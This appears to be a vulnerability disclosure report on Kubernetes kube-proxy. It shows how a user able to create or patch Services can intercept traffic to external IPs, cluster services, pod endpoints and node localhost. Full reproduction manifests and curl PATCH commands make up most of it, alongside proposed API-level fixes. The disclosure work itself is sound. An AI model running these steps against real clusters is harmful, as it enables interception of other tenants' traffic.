5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
6 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
46.7%
I rated this vulnerability as high because trying to rate it with CVSS v3.0 Calculator gives me 9.9 which seems way too high as you do require to be able to create services in the K8S cluster.
This report details 2 ways to man in the middle traffic by:
a) creating a LoadBalancer service and patching the status with the attacked IP
b) creating a ClusterIP service with ExternalIPs set to the attacked IP
For these 2 options, we explore:
This gives us 8 test cases, that I tested with kube-proxy mode IPVS, iptables, and a GKE cluster (if you need an easier repro than kubespray deployments)
Results are: {F669473}
v1.16.3 deployed using kubespray
1.15.4-gke.22 for the GKE cluster
Test cluster deployed on top of CentOS7 using kubespray v2.12.0
container_manager: containerd
etcd_deployment_type: host
kube_proxy_mode: ipvs OR kube_proxy_mode: iptables
# kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
etienne-ks141 Ready master 48m v1.16.3 10.10.52.141 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
etienne-ks142 Ready master 47m v1.16.3 10.10.52.142 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
etienne-ks143 Ready <none> 45m v1.16.3 10.10.52.143 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
etienne-ks144 Ready <none> 45m v1.16.3 10.10.52.144 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
Calico 3.7.3
CNI plugin 0.8.1
We assume that you already have a working k8s cluster
Deploy โvictim-clientโ pod to simulate an in-cluster HTTP client with curl
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: victim-client
spec:
containers:
- name: curl
image: curlimages/curl:7.67.0
command: [ "/bin/sleep", "3600" ]
EOF
Check that we have access to our external victim (here 1.1.1.1)
# from a node
curl -sv http://1.1.1.1
curl -sv https://1.1.1.1 -k
# from the pod
kubectl exec victim-client -- curl -sv http://1.1.1.1
kubectl exec victim-client -- curl -sv https://1.1.1.1 -k
Deploy our โmitm podโ
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Namespace
metadata:
name: kubeproxy-mitm
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: echoserver
namespace: kubeproxy-mitm
spec:
replicas: 1
selector:
matchLabels:
app: echoserver
template:
metadata:
labels:
app: echoserver
spec:
containers:
- image: gcr.io/google_containers/echoserver:1.10
name: echoserver
ports:
- name: http
containerPort: 8080
- name: https
containerPort: 8443
EOF
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-external-lb
namespace: kubeproxy-mitm
spec:
ports:
- name: http
port: 80
targetPort: 8080
- name: https
port: 443
targetPort: 8443
selector:
app: echoserver
type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"1.1.1.1"}]}}}'
pkill kubectl
After the patch call, LoadBalancer IP is properly configured (ie not pending)
kubectl get -n kubeproxy-mitm svc/mitm-external-lb
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# mitm-external-lb LoadBalancer 10.233.53.58 1.1.1.1 80:31475/TCP,443:31258/TCP 47s
Test if the MITM works
# node -> ip
curl -sv http://1.1.1.1
curl -sv https://1.1.1.1 -k
# pod -> ip
kubectl exec victim-client -- curl -sv http://1.1.1.1
kubectl exec victim-client -- curl -sv https://1.1.1.1 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-external-lb
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-external-eip
namespace: kubeproxy-mitm
spec:
ports:
- name: http
port: 80
targetPort: 8080
- name: https
port: 443
targetPort: 8443
selector:
app: echoserver
type: ClusterIP
externalIPs:
- 1.1.1.1
EOF
Test if the MITM works
# node -> ip
curl -sv http://1.1.1.1
curl -sv https://1.1.1.1 -k
# pod -> ip
kubectl exec victim-client -- curl -sv http://1.1.1.1
kubectl exec victim-client -- curl -sv https://1.1.1.1 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-external-eip
Find a service to attack, in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 87m
Test if the service is working
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-service-lb
namespace: kubeproxy-mitm
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: echoserver
type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-service-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"10.233.36.240"}]}}}'
pkill kubectl
Test if the MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-service-lb
Find a service to attack, in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 87m
Test if the service is working before the MITM
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-service-eip
namespace: kubeproxy-mitm
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: echoserver
type: ClusterIP
externalIPs:
- 10.233.36.240
EOF
Test if MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-service-eip
Find a service to attack + its endpoints, in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 42m
kubectl get -n kube-system endpoints kubernetes-dashboard
# NAME ENDPOINTS AGE
# kubernetes-dashboard 10.233.115.2:8443 9h
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-pod-lb
namespace: kubeproxy-mitm
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: 8443
- name: https2
port: 8443
protocol: TCP
targetPort: 8443
selector:
app: echoserver
type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-pod-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"10.233.115.2"}]}}}'
pkill kubectl
Test if MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
# node -> endpoint
curl -sv https://10.233.115.2:8443 -k
# pod -> endpoint
kubectl exec victim-client -- curl -sv https://10.233.115.2:8443 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-pod-lb
Find a service to attack + its endpoints, in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 42m
kubectl get -n kube-system endpoints kubernetes-dashboard
# NAME ENDPOINTS AGE
# kubernetes-dashboard 10.233.115.2:8443 9h
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-pod-eip
namespace: kubeproxy-mitm
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: 8443
- name: https2
port: 8443
protocol: TCP
targetPort: 8443
selector:
app: echoserver
type: ClusterIP
externalIPs:
- 10.233.115.2
EOF
Test if MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
# node -> endpoint
curl -sv https://10.233.115.2:8443 -k
# pod -> endpoint
kubectl exec victim-client -- curl -sv https://10.233.115.2:8443 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-pod-eip
(This might also work against a container with hostNetwork=true)
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-local-lb
namespace: kubeproxy-mitm
spec:
ports:
- name: smtp
port: 25
protocol: TCP
targetPort: 8080
- name: http
port: 80
protocol: TCP
targetPort: 8080
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: echoserver
type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-local-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"127.0.0.1"}]}}}'
pkill kubectl
On my CentOS7 there is postfix listening on 127.0.0.1:25 (thus the test with port 25)
Test if the MITM works
curl http://127.0.0.1:25
curl http://127.0.0.1
curl https://127.0.0.1 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-local-lb
Try to deploy our MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
name: mitm-local-eip
namespace: kubeproxy-mitm
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: echoserver
type: ClusterIP
externalIPs:
- 127.0.0.1
EOF
This one fails with
The Service "mitm-local-eip" is invalid: spec.externalIPs[0]: Invalid value: "127.0.0.1": may not be in the loopback range (127.0.0.0/8)
This work doesnโt claim to be exhaustive, here are some limitations:
Issues 2/3/4 could be fixed via a blacklist approach, at the API level, loadBalancerIP and externalIPs must not be allowed in the same range as clusterIPs, pods IPs, localhost, nodeIPs, and maybe some other reserved ranged.
Issues 1a/1b are expected behaviours in my opinion. I want to be able to access my LoadBalancer IP from my pods and nodes, so a possible fix here would be a whitelist, and give the rights to real LB controllers to update this whitelist.
We also need to make sure we canโt use the same IP as both Loadbalancer IP and external IP.
Both kube-proxy config attached
Command line to create the test GKE cluster:
gcloud beta container --project "my-project" clusters create "kubeproxy-tests" --zone "us-central1-a" --no-enable-basic-auth --cluster-version "1.15.4-gke.22" --machine-type "n1-standard-2" --image-type "COS" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --no-enable-ip-alias --network "projects/copper-frame-263204/global/networks/default" --subnetwork "projects/copper-frame-263204/regions/us-central1/subnetworks/default" --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair
For GKE I used โmetrics-serverโ instead of โkubernetes-dashboardโ as victim service
An attacker able to create and/or patch services can, depending on the mode of kube-proxy:
5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L
6 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
46.7%